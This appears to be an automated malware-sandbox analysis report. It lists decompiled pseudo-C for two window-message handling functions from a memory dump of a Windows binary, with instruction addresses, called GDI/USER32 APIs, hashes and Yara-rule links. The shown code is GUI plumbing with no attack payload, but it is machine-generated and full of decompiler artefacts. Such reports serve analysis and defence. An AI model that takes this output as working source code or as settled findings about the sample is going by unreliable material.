				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				void* _t252;
				signed int _t258;
				void* _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t285;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed int _t292;
				intOrPtr _t308;
				intOrPtr _t312;
				intOrPtr _t334;
				intOrPtr _t343;
				intOrPtr _t347;
				intOrPtr* _t354;
				signed int _t356;
				intOrPtr* _t357;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				intOrPtr* _t376;
				void* _t378;
				void* _t379;
				intOrPtr _t380;
				void* _t381;

				_t378 = _t379;
				_t380 = _t379 + 0xffffffd0;
				_v52 = 0;
				_t376 = __edx;
				_v8 = __eax;
				_push(_t378);
				_push(0x44a8fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t380;
				_t137 =  *__edx;
				_t381 = _t137 - 0x111;
				if(_t381 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t272;
						if(_t272 < 0) {
							goto L67;
						} else {
							_t273 = _t272 + 1;
							_t368 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E00449774(E00414208(_v8, _t368),  *(_t376 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t368 = _t368 + 1;
								_t273 = _t273 - 1;
								__eflags = _t273;
								if(_t273 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t275;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x495ad0; // 0x496c04
								E00456E5C( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t276 = _t275 + 1;
								_t369 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t376 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t376 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t376 + 4) & 0x0000ffff);
										}
									}
									_t158 = E00414208(_v8, _t369);
									_t296 = _v17;
									_v16 = E004496B8(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t369 = _t369 + 1;
									_t276 = _t276 - 1;
									__eflags = _t276;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00433724( *((intOrPtr*)(_v16 + 0x58)), _t296,  &_v52, __eflags);
								_t165 =  *0x495ad0; // 0x496c04
								E00456E5C( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t278;
								if(_t278 < 0) {
									goto L67;
								} else {
									_t279 = _t278 + 1;
									_t370 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E00414208(_v8, _t370);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t376 + 8);
										if(_t173 ==  *(_t376 + 8)) {
											break;
										}
										_t177 = E004496B8(_v48, 1,  *(_t376 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t370 = _t370 + 1;
											_t279 = _t279 - 1;
											__eflags = _t279;
											if(_t279 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E00449FB8(_v48, _t376);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t381 == 0) {
						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t281;
						if(_t281 < 0) {
							goto L67;
						} else {
							_t282 = _t281 + 1;
							_t371 = 0;
							__eflags = 0;
							while(1) {
								E00414208(_v8, _t371);
								_t181 = E00449758( *(_t376 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t371 = _t371 + 1;
								_t282 = _t282 - 1;
								__eflags = _t282;
								if(_t282 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t284;
							if(_t284 < 0) {
								goto L67;
							} else {
								_t285 = _t284 + 1;
								_t372 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E004496B8(E00414208(_v8, _t372), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t372 = _t372 + 1;
									_t285 = _t285 - 1;
									__eflags = _t285;
									if(_t285 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041FDA0(0, 1);
								_push(_t378);
								_push(0x44a72e);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t378);
								_push(0x44a711);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								E004207B0(_v24,  *(_v40 + 0x18));
								E0042062C(_v24);
								E0044ABA0(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t334);
								 *[fs:eax] = _t334;
								_push(0x44a718);
								__eflags = 0;
								E004207B0(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t287;
								if(_t287 < 0) {
									goto L67;
								} else {
									_t288 = _t287 + 1;
									_t373 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E004496B8(E00414208(_v8, _t373), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t373 = _t373 + 1;
										_t288 = _t288 - 1;
										__eflags = _t288;
										if(_t288 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_v32 = GetWindowDC( *(_v8 + 0x10));
									 *[fs:eax] = _t380;
									_v24 = E0041FDA0(0, 1);
									 *[fs:eax] = _t380;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t380;
									E004207B0(_v24, _v32);
									E0042062C(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44a82f, _t378,  *[fs:eax], 0x44a84c, _t378,  *[fs:eax], 0x44a871, _t378);
									_pop(_t343);
									 *[fs:eax] = _t343;
									_push(0x44a836);
									__eflags = 0;
									E004207B0(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t291;
									if(_t291 < 0) {
										goto L67;
									} else {
										_t292 = _t291 + 1;
										_t374 = 0;
										__eflags = 0;
										while(1) {
											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E00414208(_v8, _t374))) + 0x34))();
											_t347 = _v36;
											__eflags = _t252 -  *((intOrPtr*)(_t347 + 0xc));
											if(_t252 !=  *((intOrPtr*)(_t347 + 0xc))) {
												_v16 = E004496B8(E00414208(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E00414208(_v8, _t374) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t374 = _t374 + 1;
											_t292 = _t292 - 1;
											__eflags = _t292;
											if(_t292 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t258 = E004496E8(E00414208(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t258;
										if(_t258 == 0) {
											_t266 = E00414208(_v8, _t374);
											__eflags = 0;
											_t258 = E004496E8(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t354 =  *0x495c2c; // 0x496c08
										_t356 =  *( *_t354 + 0x6c);
										__eflags = _t356;
										if(_t356 != 0) {
											__eflags = _t258;
											if(_t258 == 0) {
												_t258 =  *(_t356 + 0x158);
											}
											_t308 =  *0x495c2c; // 0x496c08
											__eflags =  *(_t356 + 0x228) & 0x00000008;
											if(( *(_t356 + 0x228) & 0x00000008) == 0) {
												_t357 =  *0x495ad0; // 0x496c04
												E00456AF8( *_t357, _t292, _t308, _t258, _t374, _t376);
											} else {
												E00456B60();
											}
										}
									}
								} else {
									L67:
									_push( *(_t376 + 8));
									_push( *(_t376 + 4));
									_push( *_t376);
									_t144 =  *(_v8 + 0x10);
									_push(_t144);
									L00406D8C();
									 *(_t376 + 0xc) = _t144;
								}
								L68:
								_pop(_t312);
								 *[fs:eax] = _t312;
								_push(0x44a902);
								return E00404348( &_v52);
							}
						}
					}
				}
				L69:
			}


































































                                                                        0x0044a3c9
                                                                        0x0044a3cb
                                                                        0x0044a3d3
                                                                        0x0044a3d6
                                                                        0x0044a3d8
                                                                        0x0044a3dd
                                                                        0x0044a3de
                                                                        0x0044a3e3
                                                                        0x0044a3e6
                                                                        0x0044a3e9
                                                                        0x0044a3eb
                                                                        0x0044a3f0
                                                                        0x0044a412
                                                                        0x0044a412
                                                                        0x0044a417
                                                                        0x0044a466
                                                                        0x0044a467
                                                                        0x0044a469
                                                                        0x00000000
                                                                        0x0044a46f
                                                                        0x0044a46f
                                                                        0x0044a470
                                                                        0x0044a470
                                                                        0x0044a472
                                                                        0x0044a47f
                                                                        0x0044a484
                                                                        0x0044a486
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a48c
                                                                        0x0044a48d
                                                                        0x0044a48d
                                                                        0x0044a48e
                                                                        0x00000000
                                                                        0x0044a490
                                                                        0x00000000
                                                                        0x0044a490
                                                                        0x00000000
                                                                        0x0044a48e
                                                                        0x0044a472
                                                                        0x0044a419
                                                                        0x0044a419
                                                                        0x0044a419
                                                                        0x0044a41c
                                                                        0x0044a495
                                                                        0x0044a499
                                                                        0x0044a49d
                                                                        0x0044a49f
                                                                        0x0044a49f
                                                                        0x0044a4a9
                                                                        0x0044a4aa
                                                                        0x0044a4ac
                                                                        0x0044a522
                                                                        0x0044a522
                                                                        0x0044a52b
                                                                        0x00000000
                                                                        0x0044a4ae
                                                                        0x0044a4ae
                                                                        0x0044a4af
                                                                        0x0044a4af
                                                                        0x0044a4b1
                                                                        0x0044a4b1
                                                                        0x0044a4b5
                                                                        0x0044a4db
                                                                        0x0044a4b7
                                                                        0x0044a4b7
                                                                        0x0044a4ba
                                                                        0x0044a4bc
                                                                        0x0044a4ce
                                                                        0x0044a4be
                                                                        0x0044a4c9
                                                                        0x0044a4c9
                                                                        0x0044a4bc
                                                                        0x0044a4e3
                                                                        0x0044a4e8
                                                                        0x0044a4f3
                                                                        0x0044a4f6
                                                                        0x0044a4fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a51e
                                                                        0x0044a51f
                                                                        0x0044a51f
                                                                        0x0044a520
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a520
                                                                        0x0044a505
                                                                        0x0044a50d
                                                                        0x0044a514
                                                                        0x0044a514
                                                                        0x0044a41e
                                                                        0x0044a41e
                                                                        0x0044a41f
                                                                        0x0044a888
                                                                        0x0044a889
                                                                        0x0044a88b
                                                                        0x00000000
                                                                        0x0044a88d
                                                                        0x0044a88d
                                                                        0x0044a88e
                                                                        0x0044a88e
                                                                        0x0044a890
                                                                        0x0044a89a
                                                                        0x0044a8a2
                                                                        0x0044a8a5
                                                                        0x0044a8a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a8b2
                                                                        0x0044a8b7
                                                                        0x0044a8b9
                                                                        0x0044a8c7
                                                                        0x0044a8c8
                                                                        0x0044a8c8
                                                                        0x0044a8c9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a8b9
                                                                        0x0044a8c0
                                                                        0x0044a8c0
                                                                        0x0044a425
                                                                        0x00000000
                                                                        0x0044a425
                                                                        0x0044a41f
                                                                        0x0044a41c
                                                                        0x00000000
                                                                        0x0044a3f2
                                                                        0x0044a3f2
                                                                        0x0044a430
                                                                        0x0044a431
                                                                        0x0044a433
                                                                        0x00000000
                                                                        0x0044a439
                                                                        0x0044a439
                                                                        0x0044a43a
                                                                        0x0044a43a
                                                                        0x0044a43c
                                                                        0x0044a441
                                                                        0x0044a44a
                                                                        0x0044a44f
                                                                        0x0044a451
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a457
                                                                        0x0044a458
                                                                        0x0044a458
                                                                        0x0044a459
                                                                        0x00000000
                                                                        0x0044a45b
                                                                        0x00000000
                                                                        0x0044a45b
                                                                        0x00000000
                                                                        0x0044a459
                                                                        0x0044a43c
                                                                        0x00000000
                                                                        0x0044a3f4
                                                                        0x0044a3f4
                                                                        0x0044a3f7
                                                                        0x0044a63a
                                                                        0x0044a643
                                                                        0x0044a644
                                                                        0x0044a646
                                                                        0x00000000
                                                                        0x0044a64c
                                                                        0x0044a64c
                                                                        0x0044a64d
                                                                        0x0044a64d
                                                                        0x0044a64f
                                                                        0x0044a666
                                                                        0x0044a669
                                                                        0x0044a66d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a735
                                                                        0x0044a736
                                                                        0x0044a736
                                                                        0x0044a737
                                                                        0x00000000
                                                                        0x0044a73d
                                                                        0x00000000
                                                                        0x0044a73d
                                                                        0x00000000
                                                                        0x0044a737
                                                                        0x0044a67f
                                                                        0x0044a684
                                                                        0x0044a685
                                                                        0x0044a68a
                                                                        0x0044a68d
                                                                        0x0044a69c
                                                                        0x0044a6a1
                                                                        0x0044a6a2
                                                                        0x0044a6a7
                                                                        0x0044a6aa
                                                                        0x0044a6b6
                                                                        0x0044a6cb
                                                                        0x0044a6e4
                                                                        0x0044a6eb
                                                                        0x0044a6ee
                                                                        0x0044a6f1
                                                                        0x0044a6f6
                                                                        0x0044a6fb
                                                                        0x0044a710
                                                                        0x0044a710
                                                                        0x0044a3fd
                                                                        0x0044a3fd
                                                                        0x0044a3fe
                                                                        0x0044a745
                                                                        0x0044a74e
                                                                        0x0044a74f
                                                                        0x0044a751
                                                                        0x00000000
                                                                        0x0044a757
                                                                        0x0044a757
                                                                        0x0044a758
                                                                        0x0044a758
                                                                        0x0044a75a
                                                                        0x0044a771
                                                                        0x0044a774
                                                                        0x0044a778
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a878
                                                                        0x0044a879
                                                                        0x0044a879
                                                                        0x0044a87a
                                                                        0x00000000
                                                                        0x0044a880
                                                                        0x00000000
                                                                        0x0044a880
                                                                        0x00000000
                                                                        0x0044a87a
                                                                        0x0044a78a
                                                                        0x0044a798
                                                                        0x0044a7a7
                                                                        0x0044a7b5
                                                                        0x0044a7c1
                                                                        0x0044a7cf
                                                                        0x0044a7d8
                                                                        0x0044a7ed
                                                                        0x0044a807
                                                                        0x0044a80c
                                                                        0x0044a80f
                                                                        0x0044a812
                                                                        0x0044a817
                                                                        0x0044a81c
                                                                        0x0044a82e
                                                                        0x0044a82e
                                                                        0x0044a404
                                                                        0x0044a407
                                                                        0x0044a538
                                                                        0x0044a541
                                                                        0x0044a542
                                                                        0x0044a544
                                                                        0x00000000
                                                                        0x0044a54a
                                                                        0x0044a54a
                                                                        0x0044a54b
                                                                        0x0044a54b
                                                                        0x0044a54d
                                                                        0x0044a559
                                                                        0x0044a55c
                                                                        0x0044a55f
                                                                        0x0044a562
                                                                        0x0044a58d
                                                                        0x0044a564
                                                                        0x0044a571
                                                                        0x0044a571
                                                                        0x0044a590
                                                                        0x0044a594
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a62a
                                                                        0x0044a62b
                                                                        0x0044a62b
                                                                        0x0044a62c
                                                                        0x00000000
                                                                        0x0044a632
                                                                        0x00000000
                                                                        0x0044a632
                                                                        0x00000000
                                                                        0x0044a62c
                                                                        0x0044a5ac
                                                                        0x0044a5b1
                                                                        0x0044a5b3
                                                                        0x0044a5ba
                                                                        0x0044a5c5
                                                                        0x0044a5c7
                                                                        0x0044a5c7
                                                                        0x0044a5cc
                                                                        0x0044a5d4
                                                                        0x0044a5d7
                                                                        0x0044a5d9
                                                                        0x0044a5df
                                                                        0x0044a5e1
                                                                        0x0044a5e8
                                                                        0x0044a5e8
                                                                        0x0044a5ee
                                                                        0x0044a5f4
                                                                        0x0044a5fb
                                                                        0x0044a617
                                                                        0x0044a620
                                                                        0x0044a5fd
                                                                        0x0044a60d
                                                                        0x0044a60d
                                                                        0x0044a5fb
                                                                        0x0044a5d9
                                                                        0x0044a40d
                                                                        0x0044a8cb
                                                                        0x0044a8ce
                                                                        0x0044a8d2
                                                                        0x0044a8d5
                                                                        0x0044a8d9
                                                                        0x0044a8dc
                                                                        0x0044a8dd
                                                                        0x0044a8e2
                                                                        0x0044a8e2
                                                                        0x0044a8e5
                                                                        0x0044a8e7
                                                                        0x0044a8ea
                                                                        0x0044a8ed
                                                                        0x0044a8fa
                                                                        0x0044a8fa
                                                                        0x0044a3fe
                                                                        0x0044a3f7
                                                                        0x0044a3f2
                                                                        0x00000000

                                                                        APIs
                                                                        • SaveDC.GDI32(?), ref: 0044A697
                                                                        • RestoreDC.GDI32(?,?), ref: 0044A70B
                                                                        • GetWindowDC.USER32(?,00000000,0044A8FB), ref: 0044A785
                                                                        • SaveDC.GDI32(?), ref: 0044A7BC
                                                                        • RestoreDC.GDI32(?,?), ref: 0044A829
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044A8FB), ref: 0044A8DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: RestoreSaveWindow$NtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 1346906915-0
                                                                        • Opcode ID: 130c3424a3909ccd13e925ff723c0cbc4b0ec1993d47858ae47417f6dce1cdc7
                                                                        • Instruction ID: 70641417114627c6e5c73c337fcbb41be0628d56e5109fcb9be53ed2ef629017
                                                                        • Opcode Fuzzy Hash: 130c3424a3909ccd13e925ff723c0cbc4b0ec1993d47858ae47417f6dce1cdc7
                                                                        • Instruction Fuzzy Hash: 8BE15D34A00609DFEB10EF69C48599EF7F5FF98304B6185AAE805A7321C738ED52CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044FECC, Relevance: 9.3, APIs: 6, Instructions: 284windowCOMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E0044FECC(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				intOrPtr* _v24;
				void* __ebp;
				intOrPtr _t92;
				struct HWND__* _t93;
				struct HWND__* _t96;
				intOrPtr _t116;
				intOrPtr _t119;
				struct HWND__* _t125;
				struct HWND__* _t128;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t136;
				struct HWND__* _t138;
				struct HWND__* _t141;
				void* _t145;
				intOrPtr _t148;
				intOrPtr _t179;
				intOrPtr* _t208;
				intOrPtr _t233;
				intOrPtr _t239;
				intOrPtr _t246;
				struct HWND__* _t250;
				struct HWND__* _t251;
				struct HWND__* _t256;
				intOrPtr* _t257;
				void* _t259;
				void* _t261;
				intOrPtr _t262;
				void* _t264;
				void* _t268;

				_t259 = _t261;
				_t262 = _t261 + 0xffffffec;
				_t208 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t264 = _t92 - 0x46;
				if(_t264 > 0) {
					_t93 = _t92 - 0xb01a;
					__eflags = _t93;
					if(_t93 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004037D8(_v8, __eflags);
						}
					} else {
						__eflags = _t93 == 1;
						if(_t93 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004037D8(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t264 == 0) {
						_t116 = _v8;
						_t233 =  *0x4502fc; // 0x1
						__eflags = _t233 - ( *(_t116 + 0x1c) &  *0x4502f8);
						if(_t233 == ( *(_t116 + 0x1c) &  *0x4502f8)) {
							_t119 = _v8;
							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
								_t132 = _v8;
								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
								if( *((char*)(_t132 + 0x22b)) != 2) {
									_t133 =  *((intOrPtr*)(__edx + 8));
									_t26 = _t133 + 0x18;
									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								L30:
								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t128;
								if(_t128 == 0) {
									L32:
									 *( *((intOrPtr*)(_t208 + 8)) + 0x18) =  *( *((intOrPtr*)(_t208 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t128 == 3;
									if(_t128 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t125 == 2;
								if(_t125 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t96 = _t92 + 0xfffffffa - 3;
						if(_t96 < 0) {
							__eflags =  *0x47aaf4;
							if( *0x47aaf4 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t135 = _v8;
									__eflags =  *(_t135 + 0x1c) & 0x00000010;
									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t256 = 0;
										_t136 = _v8;
										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
										if( *((char*)(_t136 + 0x22f)) != 2) {
											_t138 =  *(_v8 + 0x220);
											__eflags = _t138;
											if(_t138 != 0) {
												__eflags = _t138 - _v8;
												if(_t138 != _v8) {
													_t256 = E0043CC2C(_t138);
												}
											}
										} else {
											_t141 = E0045072C(_v8);
											__eflags = _t141;
											if(_t141 != 0) {
												_t256 = E0043CC2C(E0045072C(_v8));
											}
										}
										__eflags = _t256;
										if(_t256 == 0) {
											goto L43;
										} else {
											_t96 = SetFocus(_t256);
										}
									}
								}
							}
							goto L44;
						} else {
							_t145 = _t96 - 0x22;
							if(_t145 == 0) {
								_v24 =  *((intOrPtr*)(__edx + 8));
								__eflags =  *_v24 - 1;
								if( *_v24 != 1) {
									goto L43;
								} else {
									_t148 = _v8;
									__eflags =  *(_t148 + 0x248);
									if( *(_t148 + 0x248) == 0) {
										goto L43;
									} else {
										_t250 = E004496B8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t250;
										if(_t250 == 0) {
											goto L43;
										} else {
											_v16 = E0041FDA0(0, 1);
											_push(_t259);
											_push(0x450142);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t259);
											_push(0x450125);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											E004207B0(_v16,  *(_v24 + 0x18));
											E0042062C(_v16);
											E0044ABA0(_t250, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t239);
											 *[fs:eax] = _t239;
											_push(0x45012c);
											__eflags = 0;
											E004207B0(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t145 == 1) {
									_t257 =  *((intOrPtr*)(__edx + 8));
									__eflags =  *_t257 - 1;
									if( *_t257 != 1) {
										goto L43;
									} else {
										_t179 = _v8;
										__eflags =  *(_t179 + 0x248);
										if( *(_t179 + 0x248) == 0) {
											goto L43;
										} else {
											_t251 = E004496B8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t257 + 8)));
											__eflags = _t251;
											if(_t251 == 0) {
												goto L43;
											} else {
												_v20 = GetWindowDC(E0043CC2C(_v8));
												 *[fs:eax] = _t262;
												_v16 = E0041FDA0(0, 1);
												 *[fs:eax] = _t262;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t262;
												E004207B0(_v16, _v20);
												E0042062C(_v16);
												 *((intOrPtr*)(_t251->i + 0x38))(_t257 + 0x10,  *[fs:eax], 0x45022c, _t259,  *[fs:eax], 0x450249, _t259,  *[fs:eax], 0x450270, _t259);
												_pop(_t246);
												 *[fs:eax] = _t246;
												_push(0x450233);
												__eflags = 0;
												E004207B0(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t268 =  *_t208 -  *0x496c10; // 0xc075
									if(_t268 == 0) {
										E00437760(_v8, 0, 0xb025, 0);
										E00437760(_v8, 0, 0xb024, 0);
										E00437760(_v8, 0, 0xb035, 0);
										E00437760(_v8, 0, 0xb009, 0);
										E00437760(_v8, 0, 0xb008, 0);
										E00437760(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t96 = E0043A6DC(_v8, _t208);
									L44:
									return _t96;
								}
							}
						}
					}
				}
			}






































                                                                        0x0044fecd
                                                                        0x0044fecf
                                                                        0x0044fed5
                                                                        0x0044fed7
                                                                        0x0044feda
                                                                        0x0044fedc
                                                                        0x0044fedf
                                                                        0x0044ff04
                                                                        0x0044ff04
                                                                        0x0044ff09
                                                                        0x0044ffb5
                                                                        0x0044ffbc
                                                                        0x0044ffc9
                                                                        0x0044ffc9
                                                                        0x0044ff0f
                                                                        0x0044ff0f
                                                                        0x0044ff10
                                                                        0x0044ff94
                                                                        0x0044ff9b
                                                                        0x0044ffa8
                                                                        0x0044ffa8
                                                                        0x0044ff12
                                                                        0x00000000
                                                                        0x0044ff12
                                                                        0x0044ff10
                                                                        0x00000000
                                                                        0x0044fee1
                                                                        0x0044fee1
                                                                        0x0044ffd3
                                                                        0x0044ffe1
                                                                        0x0044ffe8
                                                                        0x0044ffeb
                                                                        0x0044fff1
                                                                        0x0044fffb
                                                                        0x0044fffd
                                                                        0x0044ffff
                                                                        0x00450002
                                                                        0x00450009
                                                                        0x0045000b
                                                                        0x0045000e
                                                                        0x0045000e
                                                                        0x0045000e
                                                                        0x0045000e
                                                                        0x00450009
                                                                        0x0045001b
                                                                        0x0045001b
                                                                        0x0045001d
                                                                        0x00450027
                                                                        0x00450030
                                                                        0x00450030
                                                                        0x00450032
                                                                        0x0045003c
                                                                        0x0045003f
                                                                        0x00450034
                                                                        0x00450034
                                                                        0x00450036
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00450036
                                                                        0x0045001f
                                                                        0x0045001f
                                                                        0x00450021
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00450021
                                                                        0x0045001d
                                                                        0x00000000
                                                                        0x0044fee7
                                                                        0x0044feea
                                                                        0x0044feed
                                                                        0x0044ff17
                                                                        0x0044ff1e
                                                                        0x0044ff24
                                                                        0x0044ff27
                                                                        0x00000000
                                                                        0x0044ff2d
                                                                        0x0044ff2d
                                                                        0x0044ff30
                                                                        0x0044ff34
                                                                        0x00000000
                                                                        0x0044ff3a
                                                                        0x0044ff3a
                                                                        0x0044ff3c
                                                                        0x0044ff3f
                                                                        0x0044ff46
                                                                        0x0044ff68
                                                                        0x0044ff6e
                                                                        0x0044ff70
                                                                        0x0044ff72
                                                                        0x0044ff75
                                                                        0x0044ff7c
                                                                        0x0044ff7c
                                                                        0x0044ff75
                                                                        0x0044ff48
                                                                        0x0044ff4b
                                                                        0x0044ff50
                                                                        0x0044ff52
                                                                        0x0044ff61
                                                                        0x0044ff61
                                                                        0x0044ff52
                                                                        0x0044ff7e
                                                                        0x0044ff80
                                                                        0x00000000
                                                                        0x0044ff86
                                                                        0x0044ff87
                                                                        0x0044ff87
                                                                        0x0044ff80
                                                                        0x0044ff34
                                                                        0x0044ff27
                                                                        0x00000000
                                                                        0x0044feef
                                                                        0x0044feef
                                                                        0x0044fef2
                                                                        0x0045004b
                                                                        0x00450051
                                                                        0x00450054
                                                                        0x00000000
                                                                        0x0045005a
                                                                        0x0045005a
                                                                        0x0045005d
                                                                        0x00450064
                                                                        0x00000000
                                                                        0x0045006a
                                                                        0x00450080
                                                                        0x00450082
                                                                        0x00450084
                                                                        0x00000000
